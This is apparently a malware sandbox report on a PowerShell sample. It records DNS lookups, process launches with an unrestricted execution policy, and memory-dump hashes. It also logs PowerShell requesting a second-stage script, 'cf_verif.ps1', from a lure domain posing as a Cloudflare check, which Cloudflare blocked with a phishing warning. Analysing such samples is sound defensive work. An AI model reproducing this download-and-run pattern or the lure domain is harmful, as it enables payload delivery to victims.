                                  Mar 7, 2025 17:07:47.257976055 CET1.1.1.1192.168.2.40x2141No error (0)cf-prod-cap.cfd188.114.96.3A (IP address)IN (0x0001)false
                                  Mar 7, 2025 17:07:47.257976055 CET1.1.1.1192.168.2.40x2141No error (0)cf-prod-cap.cfd188.114.97.3A (IP address)IN (0x0001)false
                                  • cf-prod-cap.cfd
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449715188.114.96.34437364C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2025-03-07 16:07:49 UTC172OUTGET /cf_verif.ps1 HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                  Host: cf-prod-cap.cfd
                                  Connection: Keep-Alive
                                  2025-03-07 16:07:50 UTC558INHTTP/1.1 403 Forbidden
                                  Date: Fri, 07 Mar 2025 16:07:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYnizO9LjRiBxJSSZxIqvZ4YuGJhFued40D%2F0VAa3jz3D2StXUQnQ0Qudzyvfs%2BPjrlDLUbzGoPoomVaNbp3KFxG09gp%2Be%2FTDvq8I6G%2Bd2Mt1yVPh1vgsmEVHfgFv7UQsbI%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 91cb5918bc3466fb-DFW
                                  2025-03-07 16:07:50 UTC811INData Raw: 31 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                  Data Ascii: 11cf<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                  2025-03-07 16:07:50 UTC1369INData Raw: 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49
                                  Data Ascii: styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementByI
                                  2025-03-07 16:07:50 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69
                                  Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form acti
                                  2025-03-07 16:07:50 UTC1018INData Raw: 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 31 37 34 2e 32 34 36 2e 31 32 39 2e 36 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e
                                  Data Ascii: eal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">174.246.129.69</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1">
                                  2025-03-07 16:07:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:1
                                  Start time:11:07:45
                                  Start date:07/03/2025
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1"
                                  Imagebase:0x4c0000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:11:07:45
                                  Start date:07/03/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff62fc20000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:11:07:46
                                  Start date:07/03/2025
                                  Path:C:\Windows\System32\notepad.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\0J5R54fzDJ.ps1"
                                  Imagebase:0x7ff7d6920000
                                  File size:201'216 bytes
                                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Reset < >
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'q$4'q$4'q$4'q
                                    • API String ID: 0-4210068417
                                    • Opcode ID: eb7b46766cfb38d17f27e7e06d836057c45d54ef2f094eb5c70436379be517a0
                                    • Instruction ID: 6fa1eda5dca4a485773dac39cd039226da5c16bdbde4d5139807f3f986e6cd9f
                                    • Opcode Fuzzy Hash: eb7b46766cfb38d17f27e7e06d836057c45d54ef2f094eb5c70436379be517a0
                                    • Instruction Fuzzy Hash: 30128BB9B0430ABFD72A8B7894157BABBB2AFC1610F14807AD545CF2D1DB31C851D7A2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252148059.0000000004420000.00000040.00000800.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4420000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ecf39cb2040ece4ba1026eb3d520e2df07a47ee11b764193a3b8721999fa907
                                    • Instruction ID: 41556d18a83c90bdf6dfb20fd3055410772602114b5e6b740dd3c5340f64b57a
                                    • Opcode Fuzzy Hash: 2ecf39cb2040ece4ba1026eb3d520e2df07a47ee11b764193a3b8721999fa907
                                    • Instruction Fuzzy Hash: F8D10774E01219EFDB14CFA8D584A9EFBB2EF48314F258156E815AB351C771ED42CB90
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252148059.0000000004420000.00000040.00000800.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4420000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f70c14900deb87057e811a0d40b088307b9be8919dd5faa2f5466d4f92ff4b3c
                                    • Instruction ID: 337d6714f63b73611c572902975c3b32d329e3e93b27979198b2f7fcbcd957b4
                                    • Opcode Fuzzy Hash: f70c14900deb87057e811a0d40b088307b9be8919dd5faa2f5466d4f92ff4b3c
                                    • Instruction Fuzzy Hash: 6F91AD70A002158FCB15CF59C598AAAFBB1FF88310B25859AD805EB3A1C735FC91CBA0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c3d80bd662c74ed2e5ebe912dc748cecae0345fa3dc343ac4af7019031b17794
                                    • Instruction ID: 2e39676208c286de0cd9d8aba734117a819232ca36b89805d89d5b14d7e98967
                                    • Opcode Fuzzy Hash: c3d80bd662c74ed2e5ebe912dc748cecae0345fa3dc343ac4af7019031b17794
                                    • Instruction Fuzzy Hash: 3F413AF9A0420ABFCB168F648506BB67BF3EF80650F198496D5009F6D6D732C851D7A2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252148059.0000000004420000.00000040.00000800.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4420000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad3b7633690dcaa9938b763c07ba7d98eeb310cd068d5c2ab12217997daa92bf
                                    • Instruction ID: baff8992c4af71e497b41b38094c7ac1e23ed88f3ff1c2ee8c67bbe69093af6e
                                    • Opcode Fuzzy Hash: ad3b7633690dcaa9938b763c07ba7d98eeb310cd068d5c2ab12217997daa92bf
                                    • Instruction Fuzzy Hash: 4F416974A006158FCB15CF49C5D8EAAFBB1FF48310B5185AAD801AB360C776FD91CBA4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252148059.0000000004420000.00000040.00000800.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4420000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a658b051fc58110301fec1f33ba94f062664eeae28eb982dcc581e812bc1408f
                                    • Instruction ID: 482ca326549bc5435a50322830b96c913bf20966baaf65c3427c08435528a02d
                                    • Opcode Fuzzy Hash: a658b051fc58110301fec1f33ba94f062664eeae28eb982dcc581e812bc1408f
                                    • Instruction Fuzzy Hash: DB11F378A006199FCB14CF98D980AAAFBB5FF88310B148159E809AB351C731FC41CBA0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252001513.00000000043AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_43ad000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a74639c4182364ab43d2375e6889186c331b775fbdfa1909c3737b19dd849004
                                    • Instruction ID: e5572debaadcd4e9570293ecc43b4a8d6f8cb8f77023ba91bdae7cc6c6b2c8f0
                                    • Opcode Fuzzy Hash: a74639c4182364ab43d2375e6889186c331b775fbdfa1909c3737b19dd849004
                                    • Instruction Fuzzy Hash: D901F231545740DEFB208E21ED84B67FB88EF41624F08C01AEC484FA82D2B9A845CAB6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252001513.00000000043AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_43ad000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94a53aea614839fbd7c3a2fcd6e78a88a35d315daa72968588981c3a9d15b264
                                    • Instruction ID: c5023950dfbf2e7447994bc7eef401b6ba071f7453a7dcc717992908b2190637
                                    • Opcode Fuzzy Hash: 94a53aea614839fbd7c3a2fcd6e78a88a35d315daa72968588981c3a9d15b264
                                    • Instruction Fuzzy Hash: C901527104E3C05FE7128B259D94B56BFB4DF43224F1D81CBD8888F5A3C2695849CBB2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1252148059.0000000004420000.00000040.00000800.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4420000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86f271a1e0f0db7ec8ff8cdb4a0a06dddb715fb80afe01b4c1b939dfd281c0c3
                                    • Instruction ID: 59bb9baf841eda1a442292f92b38d7be379b1b06f092d070a771ce2971475dc9
                                    • Opcode Fuzzy Hash: 86f271a1e0f0db7ec8ff8cdb4a0a06dddb715fb80afe01b4c1b939dfd281c0c3
                                    • Instruction Fuzzy Hash: DF018C34A042559FCB16CF98C990AEDFB71FF49320F148196E555A72A1C336EC52CB60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q$l$l
                                    • API String ID: 0-1870622266
                                    • Opcode ID: fc989b0ed298dde7c526083d62f6e51bb3c17731144145170ba43a5e24f07819
                                    • Instruction ID: 4fdae2ca0a0022100017444b9c3905f39fd7ae25796051b4a9116cb1bd50098c
                                    • Opcode Fuzzy Hash: fc989b0ed298dde7c526083d62f6e51bb3c17731144145170ba43a5e24f07819
                                    • Instruction Fuzzy Hash: 12A17CBA704349BFD7269BB99801766BBF2AFC6210F28806BD509CB2D1DB71CC12D751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q$l$l
                                    • API String ID: 0-1821798344
                                    • Opcode ID: c1c37635422c638a75fcd8c9f2d354e3651c4ee3207c7f12f149dfc9577c7555
                                    • Instruction ID: b8930e724b4c80665bdfcfd56f095db66299a03dedad80d40818ed8df020a778
                                    • Opcode Fuzzy Hash: c1c37635422c638a75fcd8c9f2d354e3651c4ee3207c7f12f149dfc9577c7555
                                    • Instruction Fuzzy Hash: B0A19BB9B04342AFD7264BB994016B6BBF19FCA214F18406BD545CB2D1EB35CC51C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'q$4'q$$q$$q$$q$l$l
                                    • API String ID: 0-3535909460
                                    • Opcode ID: 94864dcbc7bf14b0e55b64347dfcdc9d2aaec1ff3900aee16e17043a0a31eda3
                                    • Instruction ID: 79fc185895aa9d3af0fb9db71230610874de999447e9ccf304396acfdac2ce19
                                    • Opcode Fuzzy Hash: 94864dcbc7bf14b0e55b64347dfcdc9d2aaec1ff3900aee16e17043a0a31eda3
                                    • Instruction Fuzzy Hash: 7D513ABAB0430EFFDB364A6994017B6BBB6AFC2620F288067D445CB6D1DB31C851D791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$$q$$q$$q
                                    • API String ID: 0-4102054182
                                    • Opcode ID: b5dbbe7ce9b6ae96fd379bada4df31a91ef05d3d45d181cd0bab78cd30f35ef1
                                    • Instruction ID: c47f6ef3392c8b5c71dd8e5737a4cb975bb273e5fcb770ff43b106bfc98b8530
                                    • Opcode Fuzzy Hash: b5dbbe7ce9b6ae96fd379bada4df31a91ef05d3d45d181cd0bab78cd30f35ef1
                                    • Instruction Fuzzy Hash: B72168BAB18306BBEB39596B9801B37A7969FC1714F24842B9519CB7C1DF3AC8418361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1261312701.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_71a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'q$4'q$$q$$q
                                    • API String ID: 0-3199993180
                                    • Opcode ID: 1f6a930067e4560a8c0bc8e55105d73241adb25a6070e6bec6e1de305756ae21
                                    • Instruction ID: a368ae062495b39a9a476e1437f7e439850c3dbee334fcc9b527f90ae6790b84
                                    • Opcode Fuzzy Hash: 1f6a930067e4560a8c0bc8e55105d73241adb25a6070e6bec6e1de305756ae21
                                    • Instruction Fuzzy Hash: 2801D665B0D3C69FD73B127818211656FB25FC3950B2E44E7C081CF693DA199C06836B